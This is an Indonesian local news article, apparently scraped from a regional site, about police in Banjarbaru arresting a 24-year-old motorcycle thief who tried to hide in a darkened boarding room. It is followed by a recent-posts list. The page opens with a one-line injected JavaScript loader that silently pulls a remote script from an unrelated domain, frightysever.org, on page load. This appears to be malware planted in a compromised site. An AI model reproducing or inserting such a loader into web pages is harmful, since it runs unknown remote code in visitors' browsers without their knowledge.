(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Hukum

Kelabui Polisi Saat Digrebek, Pelaku Curanmor Ini Diringkus


BANJARBARU, Belum sempat kabur 1×24 jam, pelaku tunggal spesialis pencurian kendaraan bermotor (Curanmor) berhasil diringkus tim buser Polsek Banjarbaru Kota pada Selasa (9/7) dini hari.

Pelaku curanmor berinisial SN (24) diamankan dari sebuah kos di Kelurahan Loktabat Utara, Banjarbaru. SN tak berkutik saat digerebek tim buser yang dipimpin Panit II Reskrim Polsek Banjarbaru Kota, Aiptu Nanang Gonjeng.

Dari keterangan kepolisian. Terungkapnya kasus curanmor SN dari laporan korban pada Senin (8/7) pukul 01.30 Wita. Saat itu korban kehilangan kendaraannya di wilayah RO Ulin Banjarbaru.

“Usai kendaraannya dicuri oleh pelaku. Korban langsung melaporkannya ke Mapolsek. Tim kita langsung olah TKP dan melakukan penyelidikan,” kata Kapolsek Banjarbaru Kota Kompol Purbo Raharjo melalui Kanit Reskrim Iptu Yuli Tetro.

Adapun, saat digerebek tim buser, pelaku rupanya sempat ingin mengelabui aparat, dengan cara membuat kos gelap gulita seakan tak berpenghuni.

Tapi, kamuflase tersebut sudah terendus pihak kepolisian. Sebab tim buser telah lebih dahulu mengantongi informasi terkait keberadaan pelaku dari hasil penyelidikan.

“Sempat sembunyi di dalam (kos). Tapi kita yakin jika pelaku ada di dalam. Langsung kita dobrak dan benar pelaku ada di dalam. Saat diamankan, ia pasrah dan tak melakukan perlawanan,” cerita Tetro.

Setelah diringkus SN dari tempat persembunyiannya tersebut. Dari hasil interogasi petugas, belakangan diketahui jika pelaku sudah melancarkan aksi beberapa kali di Banjarbaru. Khusus pencurian kendaraan bermotor roda dua.

“Benar. Total ada tiga TKP yang sudah disatroninya dengan hasil tiga unit motor, termasuk pelapor yang di RO Ulin. Saat ini barang bukti sudah kita amankan. Juga korban yang merasa kehilangan motor telah melaporkan ke kita,” tambah Tetro.

Dalam melancarkan aksinya, SN sebut Tetro mengandalkan kunci T. Ia pun juga kerap melancarkan aksinya pada malam hari. “Larut malam. Saat korban terlelap tidur. Ia khusus curanmor di rumah-rumah,” sebutnya.

Saat ini kata Tetro pihaknya masih melakukan pengembangan atas kasus ini. Sebab disinyalir kuat masih ada pelaku curanmor yang kini masih berkeliaran di wilayah Banjarbaru.

“Masih terus kita selidiki. Sebab dari kasus ini terungkap ada pelaku (curanmor) lain. Sekarang ada dua pelaku curanmor yang kita kejar. Jadi kepada masyarakat yang jadi korban bisa melapor ke kita,” pungkasnya. (rico)

Reporter : Rico
Editor : Bie

Desy Arfianty

Recent Posts

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

7 jam ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

9 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

15 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

15 jam ago

Presiden Jokowi di Booth PLN PEVS 2024, Dirut PLN Paparkan Kesiapan Ekosistem Kendaraan Listrik

KANALKALIMANTAN.COM, JAKARTA - Presiden Republik Indonesia Joko Widodo (Jokowi) mengunjungi booth PT PLN (Persero) dalam… Read More

18 jam ago

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

22 jam ago

This website uses cookies.